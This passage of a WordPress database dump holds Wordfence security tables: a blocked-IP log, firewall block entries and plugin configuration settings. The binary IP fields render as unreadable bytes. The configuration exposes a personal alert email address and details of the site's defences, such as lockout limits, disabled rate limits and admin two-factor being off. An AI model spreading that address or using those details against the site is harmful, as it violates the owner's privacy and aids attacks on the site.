('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0ʬ\Z','JP',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0H','SG',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0u','SG',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0a','NL',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0>B','GB',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',2,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0/ot,','CN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0/k','CN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0)ؼ\\','DE',2,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0\\','KR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19726,'waf'),(' A\0>\0\0\0\0\0\0\0\0','FR',2,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0&Y','US',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0q','DE',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0э-','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0ch#','ES',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0hL','SG',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0-=E','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0+','IN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0DT','GB',1,19726,'brute'),('*\0\0\0\0\0\0A`','DE',1,19726,'brute'),('&\0\0\0\0\0\04\0','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0)ؼ','DE',2,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\06','DE',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0mG','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0H8+','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0b7','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0D ','IN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0m?','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\02?}','US',1,19726,'brute'),(' A9\0\0\0\0\0\0\0\0','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0H8&','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0M','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0n','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0DR','IN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0h','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0n','CN',2,19726,'brute'),('*\0\0\0\0\0\0\0\0\0','UA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0Ǽy','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0P2','PL',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0#̬ ','NL',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0t','SG',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0\\','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0e','RU',1,19726,'brute'),('&\0\0\0\0\0\0$\0','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0G','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0 ة','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\03','CA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0K','US',1,19726,'brute'),('$\0\0\"%nx&','ID',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0Ǩ*','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0S','IR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0G','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0>Ab','SK',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0g9','VN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0pW','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0ky<','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0}','VN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0^E$','BG',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0\\͹p','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0DV','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0]','CA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0\\١','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0Ա','HK',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0B','SG',2,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19726,'brute'),('*\0@\0\0\0\0\0\0\0','RU',1,19726,'brute'),(' A\0\0\0\0\0\0\0\0','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0bf','DE',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0ٵ','CA',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0eD\'','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0ޡ','NL',2,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0^@w','BG',2,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0[y[','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0n,w','NP',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0.','SG',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0','JP',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',3,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0h','CA',1,19726,'brute'),('&\0\0\0\0\0\0 ','US',1,19726,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',2,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0:q','NL',7,19726,'waf'),('\0\0\0\0\0\0\0\0\0\0.i','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19726,'brute'),('&-\0\0\0\0\0\0\0L','US',2,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19726,'waf'),('\0\0\0\0\0\0\0\0\0\01Q','CN',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0+?','CN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0g\Z ','VN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0ٵ','CA',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0O','IT',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19725,'brute'),('*\0\0\0\0\0\0\0\0\0','UA',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0YJ','GB',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0%x','AT',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0|!','PK',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0;7','IN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0ޡ','NL',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0j','ES',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0I','IN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0=&','IN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',3,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0>Ab','SK',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0K','US',3,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0z{','US',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0R\\','CA',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\01Q','CN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0','JP',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0=*','JP',1,19725,'waf'),('\0\0\0\0\0\0\0\0\0\0D3','IN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0#ժ','SG',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0n*','CN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0','NZ',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0t>','CN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0+R','CN',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0A','RU',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0n\'7','PK',1,19725,'brute'),('&\0`\0\0\0\0\0Xͼ','US',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0&(','IT',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0@*C','US',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0%#','US',1,19725,'brute'),('\0\0\0\0\0\0\0\0\0\0T\'t','GB',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','CA',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',1,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0՘(','NL',1,19724,'brute'),(' -`\0\0\0\0\0\0-`','US',4,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0-`','US',108,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0%','US',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0-8O','US',2,19724,'waf'),('\0\0\0\0\0\0\0\0\0\06|','US',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',4,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0^@K','BG',157,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0Rf','NO',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0^@x','BG',4,19724,'waf'),('\0\0\0\0\0\0\0\0\0\0`/;','US',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0<','CH',1,19724,'brute'),('\0\0\0\0\0\0\0\0\0\0يk','US',1,19723,'brute'); /*!40000 ALTER TABLE `wpvt_wfblockediplog` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfblocks7` -- DROP TABLE IF EXISTS `wpvt_wfblocks7`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfblocks7` ( `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `type` int(10) unsigned NOT NULL DEFAULT 0, `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `blockedTime` bigint(20) NOT NULL, `reason` varchar(255) NOT NULL, `lastAttempt` int(10) unsigned DEFAULT 0, `blockedHits` int(10) unsigned DEFAULT 0, `expiration` bigint(20) unsigned NOT NULL DEFAULT 0, `parameters` text DEFAULT NULL, PRIMARY KEY (`id`), KEY `type` (`type`), KEY `IP` (`IP`), KEY `expiration` (`expiration`) ) ENGINE=MyISAM AUTO_INCREMENT=7941 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfblocks7` -- LOCK TABLES `wpvt_wfblocks7` WRITE; /*!40000 ALTER TABLE `wpvt_wfblocks7` DISABLE KEYS */; INSERT INTO `wpvt_wfblocks7` (`id`, `type`, `IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`, `expiration`, `parameters`) VALUES (7859,2,'\0\0\0\0\0\0\0\0\0\0A',1704989096,'Blocked by Wordfence Security Network',1704989096,1,1704989696,NULL),(7858,2,'\0\0\0\0\0\0\0\0\0\0_4',1704988850,'Blocked by Wordfence Security Network',1704988850,1,1704989450,NULL),(7940,2,'\0\0\0\0\0\0\0\0\0\0b7',1705074714,'Blocked by Wordfence Security Network',1705074715,2,1705075314,NULL),(7939,2,'\0\0\0\0\0\0\0\0\0\03[<',1705068869,'Blocked by Wordfence Security Network',1705068869,1,1705069469,NULL),(7938,2,'\0\0\0\0\0\0\0\0\0\0ǽ{',1705063125,'Blocked by Wordfence Security Network',1705063125,1,1705063725,NULL),(7937,2,'\0\0\0\0\0\0\0\0\0\0՘',1705061270,'Blocked by Wordfence Security Network',1705061270,1,1705061870,NULL),(7936,2,'\0\0\0\0\0\0\0\0\0\0>Ab',1705059755,'Blocked by Wordfence Security Network',1705059755,1,1705060355,NULL),(7935,2,'\0\0\0\0\0\0\0\0\0\0[y[',1705059684,'Blocked by Wordfence Security Network',1705059684,1,1705060284,NULL),(7934,2,'\0\0\0\0\0\0\0\0\0\0z\"',1705057915,'Blocked by Wordfence Security Network',1705057915,1,1705058515,NULL),(7933,2,'\0\0\0\0\0\0\0\0\0\0D4$',1705057606,'Blocked by Wordfence Security Network',1705057606,1,1705058206,NULL),(7932,2,'\0\0\0\0\0\0\0\0\0\0Y\'m',1705056383,'Blocked by Wordfence Security Network',1705056383,1,1705056983,NULL),(7931,2,'\0\0\0\0\0\0\0\0\0\0`',1705056315,'Blocked by Wordfence Security Network',1705056315,1,1705056915,NULL),(7930,2,'\0\0\0\0\0\0\0\0\0\0c',1705054452,'Blocked by Wordfence Security Network',1705054452,1,1705055052,NULL),(7929,2,'\0\0\0\0\0\0\0\0\0\0gm',1705054392,'Blocked by Wordfence Security Network',1705054392,1,1705054992,NULL),(7928,2,'\0\0\0\0\0\0\0\0\0\0C',1705053954,'Blocked by Wordfence Security Network',1705053955,2,1705054554,NULL),(7927,2,'\0\0\0\0\0\0\0\0\0\0$',1705051115,'Blocked by Wordfence Security Network',1705051115,1,1705051715,NULL),(7926,2,'\0\0\0\0\0\0\0\0\0\03k',1705051048,'Blocked by Wordfence Security Network',1705051048,1,1705051648,NULL),(7925,2,'\0\0\0\0\0\0\0\0\0\0Y',1705049799,'Blocked by Wordfence Security Network',1705049799,1,1705050399,NULL),(7924,2,'\0\0\0\0\0\0\0\0\0\0k',1705048122,'Blocked by Wordfence Security Network',1705048181,2,1705048722,NULL),(7923,2,'\0\0\0\0\0\0\0\0\0\0]',1705047801,'Blocked by Wordfence Security Network',1705047801,1,1705048401,NULL),(7922,2,'&S\01\0\0\0\0\0\0\0&',1705047736,'Blocked by Wordfence Security Network',1705047736,1,1705048336,NULL),(7921,2,'\0\0\0\0\0\0\0\0\0\0՘',1705047606,'Blocked by Wordfence Security Network',1705047606,1,1705048206,NULL),(7920,2,'\0\0\0\0\0\0\0\0\0\0E',1705044529,'Blocked by Wordfence Security Network',1705044529,1,1705045129,NULL),(7919,2,'\0\0\0\0\0\0\0\0\0\0g',1705044472,'Blocked by Wordfence Security Network',1705044472,1,1705045072,NULL),(7918,2,'\0\0\0\0\0\0\0\0\0\0j&',1705041306,'Blocked by Wordfence Security Network',1705041306,1,1705041906,NULL),(7917,2,'$\0a\0\0\0\0\0\0z ',1705041240,'Blocked by Wordfence Security Network',1705041240,1,1705041840,NULL),(7916,2,'\0\0\0\0\0\0\0\0\0\0:',1705039684,'Blocked by Wordfence Security Network',1705040172,2,1705040284,NULL),(7915,2,'\0\0\0\0\0\0\0\0\0\0M',1705038038,'Blocked by Wordfence Security Network',1705038038,1,1705038638,NULL),(7914,2,'\0\0\0\0\0\0\0\0\0\0]',1705037971,'Blocked by Wordfence Security Network',1705037971,1,1705038571,NULL),(7913,2,' A.\0\0\0\0\0\0\0\0',1705034756,'Blocked by Wordfence Security Network',1705034756,1,1705035356,NULL),(7912,2,'\0\0\0\0\0\0\0\0\0\0A',1705034689,'Blocked by Wordfence Security Network',1705034689,1,1705035289,NULL),(7911,2,'\0\0\0\0\0\0\0\0\0\0\0x',1705034498,'Blocked by Wordfence Security Network',1705034498,1,1705035098,NULL),(7910,2,'\0\0\0\0\0\0\0\0\0\0k',1705033116,'Blocked by Wordfence Security Network',1705033122,2,1705033716,NULL),(7909,2,'\0\0\0\0\0\0\0\0\0\09',1705031870,'Blocked by Wordfence Security Network',1705031870,1,1705032470,NULL),(7908,2,'\0\0\0\0\0\0\0\0\0\0m<',1705031484,'Blocked by Wordfence Security Network',1705031484,1,1705032084,NULL),(7907,2,'\0\0\0\0\0\0\0\0\0\02tf',1705031416,'Blocked by Wordfence Security Network',1705031416,1,1705032016,NULL),(7906,2,'\0\0\0\0\0\0\0\0\0\0K*',1705028189,'Blocked by Wordfence Security Network',1705028189,1,1705028789,NULL),(7905,2,'\0\0\0\0\0\0\0\0\0\0WE',1705028121,'Blocked by Wordfence Security Network',1705028121,1,1705028721,NULL),(7904,2,'\0\0\0\0\0\0\0\0\0\0]Z',1705026801,'Blocked by Wordfence Security Network',1705026801,1,1705027401,NULL),(7903,2,'\0\0\0\0\0\0\0\0\0\02tf',1705024893,'Blocked by Wordfence Security Network',1705024893,1,1705025493,NULL),(7902,2,'\0\0\0\0\0\0\0\0\0\0[9s',1705024446,'Blocked by Wordfence Security Network',1705024446,1,1705025046,NULL),(7901,2,'&\0\0Fp\0\0\0\0\0\0\0.',1705024131,'Blocked by Wordfence Security Network',1705024131,1,1705024731,NULL),(7900,2,'\0\0\0\0\0\0\0\0\0\0h+',1705022072,'Blocked by Wordfence Security Network',1705022072,1,1705022672,NULL),(7899,2,'\0\0\0\0\0\0\0\0\0\0',1705021603,'Blocked by Wordfence Security Network',1705021603,1,1705022203,NULL),(7898,2,'\0\0\0\0\0\0\0\0\0\0-wR4',1705021540,'Blocked by Wordfence Security Network',1705021540,1,1705022140,NULL),(7897,2,'*q\0\0\0\0\0\0\0',1705021530,'Blocked by Wordfence Security Network',1705021530,1,1705022130,NULL),(7896,2,'\0\0\0\0\0\0\0\0\0\0AlmW',1705019089,'Blocked by Wordfence Security Network',1705019089,1,1705019689,NULL),(7895,2,'\0\0\0\0\0\0\0\0\0\0б',1705018325,'Blocked by Wordfence Security Network',1705018325,1,1705018925,NULL),(7894,2,'\0\0\0\0\0\0\0\0\0\0q',1705018258,'Blocked by Wordfence Security Network',1705018258,1,1705018858,NULL),(7893,2,'\0\0\0\0\0\0\0\0\0\0^E8',1705016465,'Blocked by Wordfence Security Network',1705016465,1,1705017065,NULL),(7892,2,'\0\0\0\0\0\0\0\0\0\0.i',1705015055,'Blocked by Wordfence Security Network',1705015055,1,1705015655,NULL),(7891,2,'\0\0\0\0\0\0\0\0\0\03XO',1705014989,'Blocked by Wordfence Security Network',1705014989,1,1705015589,NULL),(7890,2,'\0\0\0\0\0\0\0\0\0\0F=',1705014427,'Blocked by Wordfence Security Network',1705014427,1,1705015027,NULL),(7889,2,'*\"\0\0\0\0\0\0\0',1705013589,'Blocked by Wordfence Security Network',1705013589,1,1705014189,NULL),(7888,2,'\0\0\0\0\0\0\0\0\0\0',1705013092,'Blocked by Wordfence Security Network',1705013092,1,1705013692,NULL),(7887,2,'\0\0\0\0\0\0\0\0\0\0t',1705012275,'Blocked by Wordfence Security Network',1705012275,1,1705012875,NULL),(7886,2,'*\0\0\0\0\"',1705011805,'Blocked by Wordfence Security Network',1705011805,1,1705012405,NULL),(7885,2,'\0\0\0\0\0\0\0\0\0\0Y',1705011741,'Blocked by Wordfence Security Network',1705011741,1,1705012341,NULL),(7884,2,'\0\0\0\0\0\0\0\0\0\0',1705008517,'Blocked by Wordfence Security Network',1705008517,1,1705009117,NULL),(7883,2,'\0\0\0\0\0\0\0\0\0\02p',1705008237,'Blocked by Wordfence Security Network',1705008237,1,1705008837,NULL),(7882,2,'\0\0\0\0\0\0\0\0\0\0',1705005349,'Blocked by Wordfence Security Network',1705005349,1,1705005949,NULL),(7881,2,'\0\0\0\0\0\0\0\0\0\02tf',1705005342,'Blocked by Wordfence Security Network',1705005342,1,1705005942,NULL),(7880,2,'\0\0\0\0\0\0\0\0\0\0\"KA',1705005275,'Blocked by Wordfence Security Network',1705005275,1,1705005875,NULL),(7879,2,'\0\0\0\0\0\0\0\0\0\0՘',1705004110,'Blocked by Wordfence Security Network',1705004110,1,1705004710,NULL),(7878,2,'\0\0\0\0\0\0\0\0\0\09',1705003798,'Blocked by Wordfence Security Network',1705003798,1,1705004398,NULL),(7877,2,' A%E\0\0\0\0\0\0\0\0',1705002665,'Blocked by Wordfence Security Network',1705002665,1,1705003265,NULL),(7876,2,'\0\0\0\0\0\0\0\0\0\02tf',1705002089,'Blocked by Wordfence Security Network',1705002089,1,1705002689,NULL),(7875,2,'*\0\0\0\0\0\0\0\0\0',1705002022,'Blocked by Wordfence Security Network',1705002022,1,1705002622,NULL),(7874,2,'\0\0\0\0\0\0\0\0\0\0PzX',1704999759,'Blocked by Wordfence Security Network',1704999759,1,1705000359,NULL),(7873,2,'\0\0\0\0\0\0\0\0\0\0<',1704999577,'Blocked by Wordfence Security Network',1704999577,1,1705000177,NULL),(7872,2,'\0\0\0\0\0\0\0\0\0\0ٵ',1704998740,'Blocked by Wordfence Security Network',1704998740,1,1704999340,NULL),(7871,2,'\0\0\0\0\0\0\0\0\0\0՘',1704998287,'Blocked by Wordfence Security Network',1704998287,1,1704998887,NULL),(7870,2,'\0\0\0\0\0\0\0\0\0\0Y(7',1704997116,'Blocked by Wordfence Security Network',1704997116,1,1704997716,NULL),(7869,2,'\0\0\0\0\0\0\0\0\0\0M',1704996275,'Blocked by Wordfence Security Network',1704996279,2,1704996875,NULL),(7868,2,'\0\0\0\0\0\0\0\0\0\0R\\',1704995462,'Blocked by Wordfence Security Network',1704995462,1,1704996062,NULL),(7867,2,'\0\0\0\0\0\0\0\0\0\0ޡ',1704995393,'Blocked by Wordfence Security Network',1704995393,1,1704995993,NULL),(7866,2,'\0\0\0\0\0\0\0\0\0\0b3a',1704994522,'Blocked by Wordfence Security Network',1704994950,3,1704995122,NULL),(7865,2,' A\0O\0\0\0\0\0\0\0\0',1704994319,'Blocked by Wordfence Security Network',1704994319,1,1704994919,NULL),(7864,2,'\0\0\0\0\0\0\0\0\0\0kv',1704992089,'Blocked by Wordfence Security Network',1704992090,2,1704992689,NULL),(7863,2,'\0\0\0\0\0\0\0\0\0\0j&',1704992013,'Blocked by Wordfence Security Network',1704992013,1,1704992613,NULL),(7862,2,'\0\0\0\0\0\0\0\0\0\01Q',1704991942,'Blocked by Wordfence Security Network',1704991942,1,1704992542,NULL),(7861,2,'\0\0\0\0\0\0\0\0\0\0٫d',1704991587,'Blocked by Wordfence Security Network',1704991587,1,1704992187,NULL),(7860,2,'&S\01\0\0\0\0\0\0\0&',1704990924,'Blocked by Wordfence Security Network',1704990924,1,1704991524,NULL); /*!40000 ALTER TABLE `wpvt_wfblocks7` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfconfig` -- DROP TABLE IF EXISTS `wpvt_wfconfig`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfconfig` ( `name` varchar(100) NOT NULL, `val` longblob DEFAULT NULL, `autoload` enum('no','yes') NOT NULL DEFAULT 'yes', PRIMARY KEY (`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfconfig` -- LOCK TABLES `wpvt_wfconfig` WRITE; /*!40000 ALTER TABLE `wpvt_wfconfig` DISABLE KEYS */; INSERT INTO `wpvt_wfconfig` (`name`, `val`, `autoload`) VALUES ('alertOn_update','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_throttle','0','yes'),('alertOn_block','1','yes'),('alertOn_loginLockout','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_adminLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alertOn_wafDeactivated','1','yes'),('liveTrafficEnabled','0','yes'),('advancedCommentScanning','1','yes'),('checkSpamIP','1','yes'),('spamvertizeCheck','1','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_displayExpandedRecords','0','no'),('scheduledScansEnabled','1','yes'),('lowResourceScansEnabled','0','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scan_force_ipv4_start','0','yes'),('liveActivityPauseEnabled','1','yes'),('firewallEnabled','1','yes'),('autoBlockScanners','1','yes'),('loginSecurityEnabled','1','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('notification_updatesNeeded','1','yes'),('notification_securityAlerts','1','yes'),('notification_promotions','1','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_scanStatus','1','yes'),('enableRemoteIpLookup','1','yes'),('other_hideWPVersion','0','yes'),('other_blockBadPOST','0','yes'),('other_scanComments','1','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_WFNet','1','yes'),('other_scanOutside','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('deleteTablesOnDeact','0','yes'),('autoUpdate','1','yes'),('startScansRemotely','0','yes'),('disableConfigCaching','0','yes'),('addCacheComment','0','yes'),('disableCodeExecutionUploads','0','yes'),('allowHTTPSCaching','0','yes'),('debugOn','0','yes'),('email_summary_enabled','1','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('ssl_verify','1','yes'),('ajaxWatcherDisabled_front','0','yes'),('ajaxWatcherDisabled_admin','0','yes'),('wafAlertOnAttacks','1','yes'),('disableWAFIPBlocking','0','yes'),('showAdminBarMenu','1','yes'),('displayTopLevelOptions','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayAutomaticBlocks','1','yes'),('allowLegacy2FA','0','yes'),('wordfenceI18n','1','yes'),('scan_include_extra','','yes'),('alertEmails','sara.chadwick@mac.com','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignoreUA','','yes'),('maxMem','256','yes'),('scan_exclude','','yes'),('scan_maxIssues','1000','yes'),('scan_maxDuration','','yes'),('scan_max_resume_attempts','2','yes'),('whitelisted','','yes'),('whitelistedServices','{}','yes'),('bannedURLs','','yes'),('maxExecutionTime','0','yes'),('howGetIPs','','yes'),('actUpdateInterval','2','yes'),('alert_maxHourly','0','yes'),('loginSec_userBlacklist','','yes'),('liveTraf_maxRows','2000','yes'),('liveTraf_maxAge','30','yes'),('neverBlockBG','neverBlockVerified','yes'),('loginSec_countFailMins','240','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('blockedTime','300','yes'),('email_summary_interval','weekly','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@